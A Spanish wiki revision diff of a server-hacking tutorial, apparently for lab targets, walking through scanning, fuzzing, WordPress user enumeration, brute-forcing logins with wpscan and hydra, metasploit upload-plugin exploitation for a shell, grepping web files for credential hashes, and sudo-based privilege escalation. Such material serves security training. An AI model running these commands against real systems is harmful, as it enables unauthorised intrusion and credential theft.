Muestra las diferencias entre dos versiones de la página.
Ambos lados, revisión anterior Revisión previa Próxima revisión | Revisión previa | ||
tutorial:hacking-servidores [2025/04/28 03:12] truper |
tutorial:hacking-servidores [2025/05/12 05:00] (actual) truper |
||
---|---|---|---|
Línea 51: | Línea 51: | ||
* -h ip | * -h ip | ||
* -p puerto | * -p puerto | ||
- | * -C all -> Revisar todas las cookies y cabeceras | ||
* **Ejemplo:** | * **Ejemplo:** | ||
- | * nikto -h %%http://192.168.0.227%% -p 80 -Tuning 9 -C all -output scan_nikto.txt | + | * nikto -h %%http://192.168.0.227%% -p 80 -output scan_nikto.txt |
**8º Fuerza bruta y pistas** | **8º Fuerza bruta y pistas** | ||
Línea 62: | Línea 61: | ||
* %%cewl http://dominio.com -w lista_palabras.txt%% | * %%cewl http://dominio.com -w lista_palabras.txt%% | ||
* **Con las pistas más relevantes que saquemos de lista_palabras.txt y del resto analizado crear un diccionario de fuerza bruta a medida** | * **Con las pistas más relevantes que saquemos de lista_palabras.txt y del resto analizado crear un diccionario de fuerza bruta a medida** | ||
- | * %%john --wordlist=palabras_relevantes.txt --rules --stdout > diccionario.txt%% | + | * %%princeprocessor palabras_relevantes.txt > diccionario.txt%% |
- | **9º Probar a hacer fuzzing a ver si hay algún panel de login o algo útil, ejemplos:** \\ | + | **9º Identificar aplicaciones web instaladas, //**CMS**//** |
+ | * Hacer **fuzzing** para descubrir rutas, archivos de interés y **CMS** instalado | ||
+ | * p1=directory-list-2.3-medium.txt | ||
+ | * ffuf -u %%http://ip/FUZZ -w $p1%% -ac -fw 60000-90894 | ||
+ | * ffuf -u %%http://ip/admin/FUZZ -w $p1%% -ac -fw 60000-90894 | ||
+ | * feroxbuster -u %%http://pagina.com -w%% $p1 -o resultado.txt -x php,html,txt | ||
+ | * Encontrar **paneles de login** (rutas por defecto de instalación) | ||
+ | * Encontrar **versión** de **CMS** en el **código** fuente **html** de la página principal | ||
+ | * Buscar si hay **exploits para** esa versión de **CMS** | ||
+ | * Buscar si hay **nombre** de **usuario** en la página principal del **CMS** | ||
+ | * En **wordpress** | ||
+ | * Enumerar **plugins, usuarios**: | ||
+ | * %%wpscan --url http://192.168.0.137/wordpress --enumerate u,p%% | ||
+ | * **Ataque con acceso** | ||
+ | * 1º ataque de **fuerza bruta** | ||
+ | * A **xmlrpc.php de wordpress** (que permite múltiples intentos de login en una sola solicitud.) | ||
+ | * %%wpscan --url http://192.168.0.137/wordpress -U maria -P rockyou.txt%% | ||
+ | * Al **panel de login** como en cualquier otro **CMS** (menos eficiente y más dificil de escribir) | ||
+ | * Con **hydra** | ||
+ | * data="cadena del inspector de código de firefox del archivo login.php" | ||
+ | * hydra -l pepe -P rockyou.txt url http-post-form data | ||
+ | * Con un script hecho a medida como el de [[https://github.com/0xDTC/Bludit-3.9.2-Auth-Bruteforce-Bypass-CVE-2019-17240/blob/master/CVE-2019-17240|Bludit]] | ||
+ | * 2º Una vez descubierta la contraseña se explota una **vulnerabilidad** en un **plugin de subida de archivos** | ||
+ | * Desde metasploit (fácil) | ||
+ | * Comandos | ||
+ | * search wordpress | ||
+ | * use 0 | ||
+ | * show options | ||
+ | * set, run | ||
+ | * una vez dentro se obtiene **shell** como usuario **www-data** y: | ||
+ | * Se buscan **hashes y credenciales** por los archivos de la ruta del **CMS** __%%/var/www/html/loquesea%%__ | ||
+ | * %%grep -irE '[a-z]+:\$' /var/www/cms/*%% | ||
+ | * %%grep -irE '[a-z]+@gmail' /var/www/cms/*%% | ||
+ | * Obtenido el **hash** se intenta **descifrar** en **[[https://crackstation.net|crackstation]]** | ||
+ | * Se intenta hacer **escalada a root** | ||
+ | * **sudo -l** (con el que estamos), **sudo -l -U www-data** | ||
+ | * (ALL : ALL) ALL | ||
+ | * (ALL) NOPASSWD: ALL -> El usuario puede ejecutar cualquier comando como root sin necesidad de contraseña. Escalada inmediata. | ||
+ | * creando el archivo malicioso (payload) con metasploit que contiene una reverse shell (más difícil) | ||
- | * ffuf -u %%http://ip/FUZZ -w directory-list-2.3-medium.txt%% -ac -fw 60000-90894 | + | |
- | * ffuf -u %%http://ip/admin/FUZZ -w directory-list-2.3-medium.txt%% -ac -fw 60000-90894 | + | |
.....continuará. Feliz hacking 8-) | .....continuará. Feliz hacking 8-) |